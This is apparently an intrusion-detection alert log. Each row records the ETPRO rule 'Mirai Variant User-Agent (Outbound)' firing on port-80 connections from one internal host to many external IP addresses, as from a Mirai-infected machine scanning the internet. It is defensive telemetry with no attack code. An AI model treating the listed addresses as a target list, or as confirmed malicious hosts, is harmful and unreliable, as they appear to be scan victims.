192.168.2.1595.59.106.19255242802839471 02/14/24-09:30:34.062554	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55242	80	192.168.2.15	95.59.106.192
192.168.2.1595.101.241.1259074802839471 02/14/24-09:30:14.533215	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59074	80	192.168.2.15	95.101.241.12
192.168.2.1588.99.36.11951556802839471 02/14/24-09:30:06.226730	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51556	80	192.168.2.15	88.99.36.119
192.168.2.1595.217.161.16951832802839471 02/14/24-09:30:24.692627	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51832	80	192.168.2.15	95.217.161.169
192.168.2.1588.99.97.11639818802839471 02/14/24-09:30:19.609726	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39818	80	192.168.2.15	88.99.97.116
192.168.2.15112.159.70.23836342802839471 02/14/24-09:29:22.049211	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36342	80	192.168.2.15	112.159.70.238
192.168.2.1588.12.95.4536480802839471 02/14/24-09:29:31.793267	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36480	80	192.168.2.15	88.12.95.45
192.168.2.15112.132.215.15345590802839471 02/14/24-09:29:48.351282	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45590	80	192.168.2.15	112.132.215.153
192.168.2.1595.237.209.8143078802839471 02/14/24-09:31:06.734740	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43078	80	192.168.2.15	95.237.209.81
192.168.2.1595.83.127.15438446802839471 02/14/24-09:31:13.699113	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38446	80	192.168.2.15	95.83.127.154
192.168.2.1595.56.57.21048484802839471 02/14/24-09:29:33.513112	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48484	80	192.168.2.15	95.56.57.210
192.168.2.1588.212.8.1259908802839471 02/14/24-09:31:16.432632	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59908	80	192.168.2.15	88.212.8.12
192.168.2.15112.78.1.5734772802839471 02/14/24-09:29:01.019005	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34772	80	192.168.2.15	112.78.1.57
192.168.2.1595.101.116.4852464802839471 02/14/24-09:29:08.916682	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52464	80	192.168.2.15	95.101.116.48
192.168.2.1595.101.200.9745228802839471 02/14/24-09:29:51.448153	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45228	80	192.168.2.15	95.101.200.97
192.168.2.15112.169.120.24251906802839471 02/14/24-09:28:49.299837	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51906	80	192.168.2.15	112.169.120.242
192.168.2.15112.168.163.8042402802839471 02/14/24-09:30:10.668281	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42402	80	192.168.2.15	112.168.163.80
192.168.2.1595.100.205.644980802839471 02/14/24-09:30:52.970267	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44980	80	192.168.2.15	95.100.205.6
192.168.2.1595.217.237.3641208802839471 02/14/24-09:30:44.640108	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41208	80	192.168.2.15	95.217.237.36
192.168.2.15112.74.32.15542252802839471 02/14/24-09:29:22.833929	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42252	80	192.168.2.15	112.74.32.155
192.168.2.1595.110.177.15035120802839471 02/14/24-09:30:11.637297	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35120	80	192.168.2.15	95.110.177.150
192.168.2.1595.217.203.25134672802839471 02/14/24-09:29:56.523072	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34672	80	192.168.2.15	95.217.203.251
192.168.2.15112.180.15.8435190802839471 02/14/24-09:28:47.080473	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35190	80	192.168.2.15	112.180.15.84
192.168.2.1595.217.16.10152880802839471 02/14/24-09:31:13.514224	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52880	80	192.168.2.15	95.217.16.101
192.168.2.1595.86.125.8955130802839471 02/14/24-09:29:40.363153	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55130	80	192.168.2.15	95.86.125.89
192.168.2.1588.221.180.11948634802839471 02/14/24-09:31:11.284539	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48634	80	192.168.2.15	88.221.180.119
192.168.2.1595.214.235.22136028802839471 02/14/24-09:31:17.920887	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36028	80	192.168.2.15	95.214.235.221
192.168.2.15112.60.15.22439526802839471 02/14/24-09:29:28.156474	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39526	80	192.168.2.15	112.60.15.224
192.168.2.1595.101.221.6643204802839471 02/14/24-09:29:35.298891	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43204	80	192.168.2.15	95.101.221.66
192.168.2.1595.143.181.9839556802839471 02/14/24-09:30:52.937642	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39556	80	192.168.2.15	95.143.181.98
192.168.2.1595.217.183.14157652802839471 02/14/24-09:30:37.201439	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57652	80	192.168.2.15	95.217.183.141
192.168.2.1595.100.127.1545086802839471 02/14/24-09:28:47.585598	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45086	80	192.168.2.15	95.100.127.15
192.168.2.15112.105.38.9855688802839471 02/14/24-09:29:01.649846	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55688	80	192.168.2.15	112.105.38.98
192.168.2.1595.42.211.5533254802839471 02/14/24-09:31:06.727203	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33254	80	192.168.2.15	95.42.211.55
192.168.2.1595.56.20.1555822802839471 02/14/24-09:30:06.605735	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55822	80	192.168.2.15	95.56.20.15
192.168.2.1595.101.203.21236494802839471 02/14/24-09:30:50.503021	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36494	80	192.168.2.15	95.101.203.212
192.168.2.1595.0.142.18850632802839471 02/14/24-09:30:27.512422	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50632	80	192.168.2.15	95.0.142.188
192.168.2.1595.101.41.16842310802839471 02/14/24-09:30:24.695697	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42310	80	192.168.2.15	95.101.41.168
192.168.2.1595.170.82.19952622802839471 02/14/24-09:31:13.467215	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52622	80	192.168.2.15	95.170.82.199
192.168.2.1588.218.138.4242472802839471 02/14/24-09:30:26.278524	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42472	80	192.168.2.15	88.218.138.42
192.168.2.1595.101.14.3748976802839471 02/14/24-09:30:24.696063	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48976	80	192.168.2.15	95.101.14.37
192.168.2.1595.46.0.15657584802839471 02/14/24-09:31:16.887660	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57584	80	192.168.2.15	95.46.0.156
192.168.2.1595.100.231.12333398802839471 02/14/24-09:30:24.256489	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33398	80	192.168.2.15	95.100.231.123
192.168.2.1595.101.175.21351674802839471 02/14/24-09:30:50.097654	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51674	80	192.168.2.15	95.101.175.213
192.168.2.15112.126.91.17755850802839471 02/14/24-09:29:13.338241	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55850	80	192.168.2.15	112.126.91.177
192.168.2.15112.74.59.15052534802839471 02/14/24-09:29:00.651651	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52534	80	192.168.2.15	112.74.59.150
192.168.2.1595.100.205.13259690802839471 02/14/24-09:30:43.758353	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59690	80	192.168.2.15	95.100.205.132
192.168.2.15112.74.127.16356520802839471 02/14/24-09:31:14.865359	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56520	80	192.168.2.15	112.74.127.163
192.168.2.15112.167.233.639906802839471 02/14/24-09:29:22.020632	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39906	80	192.168.2.15	112.167.233.6
192.168.2.15112.85.242.20144188802839471 02/14/24-09:30:08.929550	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44188	80	192.168.2.15	112.85.242.201
192.168.2.1588.99.179.5658608802839471 02/14/24-09:29:33.638348	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58608	80	192.168.2.15	88.99.179.56
192.168.2.1595.100.105.18943004802839471 02/14/24-09:29:08.720880	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43004	80	192.168.2.15	95.100.105.189
192.168.2.1595.111.254.5749402802839471 02/14/24-09:29:56.727571	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49402	80	192.168.2.15	95.111.254.57
192.168.2.1595.168.249.2636194802839471 02/14/24-09:29:33.449356	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36194	80	192.168.2.15	95.168.249.26
192.168.2.1588.212.218.1837846802839471 02/14/24-09:30:19.189345	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37846	80	192.168.2.15	88.212.218.18
192.168.2.1595.217.80.17439124802839471 02/14/24-09:29:42.740948	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39124	80	192.168.2.15	95.217.80.174
192.168.2.1595.128.129.6141502802839471 02/14/24-09:29:33.421569	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41502	80	192.168.2.15	95.128.129.61
192.168.2.15112.192.19.9746576802839471 02/14/24-09:29:48.420063	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46576	80	192.168.2.15	112.192.19.97
192.168.2.1595.68.75.4935480802839471 02/14/24-09:30:11.639631	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35480	80	192.168.2.15	95.68.75.49
192.168.2.15112.216.115.5034804802839471 02/14/24-09:29:14.015912	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34804	80	192.168.2.15	112.216.115.50
192.168.2.1595.100.5.12358368802839471 02/14/24-09:29:19.170435	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58368	80	192.168.2.15	95.100.5.123
192.168.2.1595.216.240.14335680802839471 02/14/24-09:29:24.661179	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35680	80	192.168.2.15	95.216.240.143
192.168.2.1595.58.72.21538812802839471 02/14/24-09:30:59.762543	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38812	80	192.168.2.15	95.58.72.215
192.168.2.1595.86.81.6052832802839471 02/14/24-09:30:48.149472	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52832	80	192.168.2.15	95.86.81.60
192.168.2.1595.35.40.9057198802839471 02/14/24-09:28:56.307430	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57198	80	192.168.2.15	95.35.40.90
192.168.2.1588.147.150.4442840802839471 02/14/24-09:30:08.412746	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42840	80	192.168.2.15	88.147.150.44
192.168.2.1595.80.219.17451486802839471 02/14/24-09:29:56.726004	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51486	80	192.168.2.15	95.80.219.174
192.168.2.1588.221.100.24851888802839471 02/14/24-09:30:03.422935	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51888	80	192.168.2.15	88.221.100.248
192.168.2.15112.124.32.5657990802839471 02/14/24-09:30:04.967124	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57990	80	192.168.2.15	112.124.32.56
192.168.2.1588.221.4.17653670802839471 02/14/24-09:30:26.259209	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53670	80	192.168.2.15	88.221.4.176
192.168.2.15112.47.11.21053612802839471 02/14/24-09:29:05.762313	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53612	80	192.168.2.15	112.47.11.210
192.168.2.1595.66.132.1335420802839471 02/14/24-09:29:42.765276	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35420	80	192.168.2.15	95.66.132.13
192.168.2.1595.79.100.4034114802839471 02/14/24-09:30:14.762774	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34114	80	192.168.2.15	95.79.100.40
192.168.2.1588.149.181.11556704802839471 02/14/24-09:28:46.591603	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56704	80	192.168.2.15	88.149.181.115
192.168.2.1595.67.8.23960210802839471 02/14/24-09:30:06.552746	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60210	80	192.168.2.15	95.67.8.239
192.168.2.1595.100.226.5242386802839471 02/14/24-09:30:24.466282	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42386	80	192.168.2.15	95.100.226.52
192.168.2.1595.100.182.22458762802839471 02/14/24-09:29:24.857767	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58762	80	192.168.2.15	95.100.182.224
192.168.2.1588.203.250.10053678802839471 02/14/24-09:29:44.339565	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53678	80	192.168.2.15	88.203.250.100
192.168.2.1595.216.124.14643754802839471 02/14/24-09:30:48.383690	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43754	80	192.168.2.15	95.216.124.146
192.168.2.1595.217.133.22457376802839471 02/14/24-09:29:38.541946	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57376	80	192.168.2.15	95.217.133.224
192.168.2.1588.119.167.11553226802839471 02/14/24-09:28:46.591804	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53226	80	192.168.2.15	88.119.167.115
192.168.2.1595.85.71.19159590802839471 02/14/24-09:29:24.925955	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59590	80	192.168.2.15	95.85.71.191
192.168.2.1595.110.208.13752208802839471 02/14/24-09:29:56.739664	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52208	80	192.168.2.15	95.110.208.137
192.168.2.1595.138.144.21753080802839471 02/14/24-09:30:19.384540	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53080	80	192.168.2.15	95.138.144.217
192.168.2.15112.196.74.19359552802839471 02/14/24-09:29:03.444660	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59552	80	192.168.2.15	112.196.74.193
192.168.2.15112.83.36.6245418802839471 02/14/24-09:30:36.980156	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45418	80	192.168.2.15	112.83.36.62
192.168.2.1588.198.144.14234420802839471 02/14/24-09:30:26.486090	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34420	80	192.168.2.15	88.198.144.142
192.168.2.1595.79.101.5458964802839471 02/14/24-09:29:09.728994	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58964	80	192.168.2.15	95.79.101.54
192.168.2.15112.168.50.10039236802839471 02/14/24-09:29:03.691469	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39236	80	192.168.2.15	112.168.50.100
192.168.2.1595.59.50.1939022802839471 02/14/24-09:29:38.813057	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39022	80	192.168.2.15	95.59.50.19
192.168.2.1595.211.212.4053772802839471 02/14/24-09:30:59.478488	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53772	80	192.168.2.15	95.211.212.40
192.168.2.1595.216.160.15060372802839471 02/14/24-09:29:35.305382	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60372	80	192.168.2.15	95.216.160.150
192.168.2.1595.101.175.21351628802839471 02/14/24-09:30:48.297254	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51628	80	192.168.2.15	95.101.175.213
192.168.2.1595.100.191.24239406802839471 02/14/24-09:30:59.704532	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39406	80	192.168.2.15	95.100.191.242
192.168.2.1595.100.185.3740624802839471 02/14/24-09:29:15.215315	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40624	80	192.168.2.15	95.100.185.37
192.168.2.1595.216.115.16842972802839471 02/14/24-09:30:48.373876	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42972	80	192.168.2.15	95.216.115.168
192.168.2.1595.216.93.4944210802839471 02/14/24-09:29:24.436194	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44210	80	192.168.2.15	95.216.93.49
192.168.2.1595.216.154.22659490802839471 02/14/24-09:30:41.261433	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59490	80	192.168.2.15	95.216.154.226
192.168.2.1595.79.31.24633940802839471 02/14/24-09:30:53.704867	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33940	80	192.168.2.15	95.79.31.246
192.168.2.1595.215.242.2152620802839471 02/14/24-09:28:47.609966	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52620	80	192.168.2.15	95.215.242.21
192.168.2.1595.217.87.4746680802839471 02/14/24-09:29:38.542183	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46680	80	192.168.2.15	95.217.87.47
192.168.2.1595.169.26.22634884802839471 02/14/24-09:30:33.911087	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34884	80	192.168.2.15	95.169.26.226
192.168.2.15112.213.39.9534188802839471 02/14/24-09:29:27.776716	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34188	80	192.168.2.15	112.213.39.95
192.168.2.1588.32.110.17057918802839471 02/14/24-09:29:42.295082	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57918	80	192.168.2.15	88.32.110.170
192.168.2.1595.58.194.5851742802839471 02/14/24-09:30:10.328928	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51742	80	192.168.2.15	95.58.194.58
192.168.2.15112.30.175.16553522802839471 02/14/24-09:29:03.417771	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53522	80	192.168.2.15	112.30.175.165
192.168.2.1588.221.127.19752636802839471 02/14/24-09:30:26.255701	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52636	80	192.168.2.15	88.221.127.197
192.168.2.1595.142.35.9154212802839471 02/14/24-09:30:10.010975	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54212	80	192.168.2.15	95.142.35.91
192.168.2.1595.221.199.10835078802839471 02/14/24-09:28:56.286077	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35078	80	192.168.2.15	95.221.199.108
192.168.2.1595.43.238.15938722802839471 02/14/24-09:30:55.714628	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38722	80	192.168.2.15	95.43.238.159
192.168.2.1595.68.46.23459204802839471 02/14/24-09:30:24.482803	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59204	80	192.168.2.15	95.68.46.234
192.168.2.15112.197.165.13456052802839471 02/14/24-09:29:03.449616	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56052	80	192.168.2.15	112.197.165.134
192.168.2.1595.86.112.12039662802839471 02/14/24-09:30:29.871939	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39662	80	192.168.2.15	95.86.112.120
192.168.2.1595.216.208.20443462802839471 02/14/24-09:31:13.060820	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43462	80	192.168.2.15	95.216.208.204
192.168.2.1595.217.236.4644412802839471 02/14/24-09:29:29.700847	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44412	80	192.168.2.15	95.217.236.46
192.168.2.15112.171.185.10138516802839471 02/14/24-09:29:36.795584	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38516	80	192.168.2.15	112.171.185.101
192.168.2.1595.86.111.17755042802839471 02/14/24-09:30:37.233959	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55042	80	192.168.2.15	95.86.111.177
192.168.2.1588.96.62.21437116802839471 02/14/24-09:30:03.395436	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37116	80	192.168.2.15	88.96.62.214
192.168.2.1595.78.232.11339258802839471 02/14/24-09:30:24.712098	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39258	80	192.168.2.15	95.78.232.113
192.168.2.1595.165.230.1047848802839471 02/14/24-09:30:19.435955	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47848	80	192.168.2.15	95.165.230.10
192.168.2.15112.135.211.25543794802839471 02/14/24-09:28:47.121988	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43794	80	192.168.2.15	112.135.211.255
192.168.2.15112.158.120.20859996802839471 02/14/24-09:31:09.292148	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59996	80	192.168.2.15	112.158.120.208
192.168.2.1595.0.98.8853598802839471 02/14/24-09:29:56.976905	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53598	80	192.168.2.15	95.0.98.88
192.168.2.1588.99.29.24933758802839471 02/14/24-09:29:32.010329	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33758	80	192.168.2.15	88.99.29.249
192.168.2.1595.85.26.1732844802839471 02/14/24-09:30:52.921987	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	32844	80	192.168.2.15	95.85.26.17
192.168.2.15112.90.95.7346424802839471 02/14/24-09:31:06.192447	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46424	80	192.168.2.15	112.90.95.73
192.168.2.1595.165.139.21060806802839471 02/14/24-09:28:47.591618	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60806	80	192.168.2.15	95.165.139.210
192.168.2.15112.90.88.9033838802839471 02/14/24-09:30:11.038672	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33838	80	192.168.2.15	112.90.88.90
192.168.2.1588.198.38.7944240802839471 02/14/24-09:30:31.340101	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44240	80	192.168.2.15	88.198.38.79
192.168.2.1595.210.96.5533542802839471 02/14/24-09:29:24.411294	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33542	80	192.168.2.15	95.210.96.55
192.168.2.15112.177.57.839686802839471 02/14/24-09:29:48.325813	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39686	80	192.168.2.15	112.177.57.8
192.168.2.1595.216.30.5058040802839471 02/14/24-09:30:14.753452	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58040	80	192.168.2.15	95.216.30.50
192.168.2.1595.216.41.5258672802839471 02/14/24-09:30:19.416264	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58672	80	192.168.2.15	95.216.41.52
192.168.2.1595.100.149.4249860802839471 02/14/24-09:31:17.899931	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49860	80	192.168.2.15	95.100.149.42
192.168.2.1595.100.203.6955932802839471 02/14/24-09:28:56.038983	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55932	80	192.168.2.15	95.100.203.69
192.168.2.1595.216.140.6458794802839471 02/14/24-09:29:42.743456	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58794	80	192.168.2.15	95.216.140.64
192.168.2.1588.221.78.21058378802839471 02/14/24-09:28:46.581700	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58378	80	192.168.2.15	88.221.78.210
192.168.2.15112.124.165.10839986802839471 02/14/24-09:29:54.239906	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39986	80	192.168.2.15	112.124.165.108
192.168.2.1595.111.242.7943940802839471 02/14/24-09:30:19.400442	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43940	80	192.168.2.15	95.111.242.79
192.168.2.1588.249.66.4644304802839471 02/14/24-09:30:19.848334	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44304	80	192.168.2.15	88.249.66.46
192.168.2.1595.101.78.6946436802839471 02/14/24-09:30:14.535525	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46436	80	192.168.2.15	95.101.78.69
192.168.2.1595.174.28.16435644802839471 02/14/24-09:30:37.193511	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35644	80	192.168.2.15	95.174.28.164
192.168.2.1595.216.173.12433430802839471 02/14/24-09:29:15.246798	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33430	80	192.168.2.15	95.216.173.124
192.168.2.15112.13.121.10151742802839471 02/14/24-09:30:03.594758	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51742	80	192.168.2.15	112.13.121.101
192.168.2.15112.197.81.18759498802839471 02/14/24-09:29:48.436887	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59498	80	192.168.2.15	112.197.81.187
192.168.2.1595.86.125.19951396802839471 02/14/24-09:30:59.785772	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51396	80	192.168.2.15	95.86.125.199
192.168.2.1595.56.209.4359496802839471 02/14/24-09:29:15.309796	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59496	80	192.168.2.15	95.56.209.43
192.168.2.15112.168.102.2948300802839471 02/14/24-09:29:26.534411	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48300	80	192.168.2.15	112.168.102.29
192.168.2.1595.179.193.10038656802839471 02/14/24-09:30:11.612228	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38656	80	192.168.2.15	95.179.193.100
192.168.2.1595.100.66.16658512802839471 02/14/24-09:30:59.454642	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58512	80	192.168.2.15	95.100.66.166
192.168.2.1595.47.167.6552484802839471 02/14/24-09:28:47.589849	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52484	80	192.168.2.15	95.47.167.65
192.168.2.1588.147.5.6334948802839471 02/14/24-09:29:15.554778	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34948	80	192.168.2.15	88.147.5.63
192.168.2.1588.10.162.1247362802839471 02/14/24-09:29:38.317134	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47362	80	192.168.2.15	88.10.162.12
192.168.2.1595.100.136.4034484802839471 02/14/24-09:29:56.539233	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34484	80	192.168.2.15	95.100.136.40
192.168.2.1588.221.34.1853612802839471 02/14/24-09:30:21.250100	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53612	80	192.168.2.15	88.221.34.18
192.168.2.1595.101.201.14860120802839471 02/14/24-09:28:47.570065	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60120	80	192.168.2.15	95.101.201.148
192.168.2.15112.83.37.17739940802839471 02/14/24-09:30:16.369828	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39940	80	192.168.2.15	112.83.37.177
192.168.2.1595.57.108.5152274802839471 02/14/24-09:29:09.207734	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52274	80	192.168.2.15	95.57.108.51
192.168.2.1588.221.37.3152232802839471 02/14/24-09:30:43.927469	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52232	80	192.168.2.15	88.221.37.31
192.168.2.15112.25.57.4354648802839471 02/14/24-09:31:01.795046	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54648	80	192.168.2.15	112.25.57.43
192.168.2.15112.175.243.5660060802839471 02/14/24-09:28:47.077014	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60060	80	192.168.2.15	112.175.243.56
